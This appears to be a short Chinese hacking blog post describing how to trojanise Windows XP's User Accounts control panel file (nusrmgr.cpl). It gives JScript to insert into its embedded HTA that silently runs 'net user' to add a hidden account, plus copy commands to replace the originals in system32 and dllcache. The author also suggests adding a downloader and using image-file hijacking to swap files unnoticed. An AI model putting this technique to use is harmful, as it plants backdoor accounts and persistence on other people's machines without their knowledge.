SpookZanG

作者：lcx

这是我用restorator 打开nusrmgr.cpl时的情形。你看到了什么？是不是很吃惊，原来xp中控制面板中的“用户帐户”选项竟然是html做的。其实不然，微软的好多组 件的面板都是html做的。这也是微软为什么一直无法清掉ie的原因，它牵涉太多了，就算是反垄断法也不可能让微软删掉ie的。

看到图中的那个NUSRMGR.HTA文件了吗？我们可以用它来做下手脚（当然你选别的js文件也是可以的）

我们在里边加几行js语句：

1
2

var WshShell = CreateObject("WScript.Shell")
WshShell.Run("net.exe user lcx lcx /add", 0, true)

当然你加下载者更好，我只是做个示例。

然后：

1
2

echo y|copy nusrmgr.cpl c:\windows\system32\dllcache\nusrmgr.cpl
echo y|copy nusrmgr.cpl c:\windows\system32\nusrmgr.cpl

替换原来的文件。这样以后用户再调用控制面板里的“用户帐户”选项后，就会自动给你加一个帐户了。

这算是一个思路了，应当很鸡肋。如果要完美一点，可以查看一下别的cpl文件如何更改，如何无声无息的替掉原来的文件(如镜像劫持)。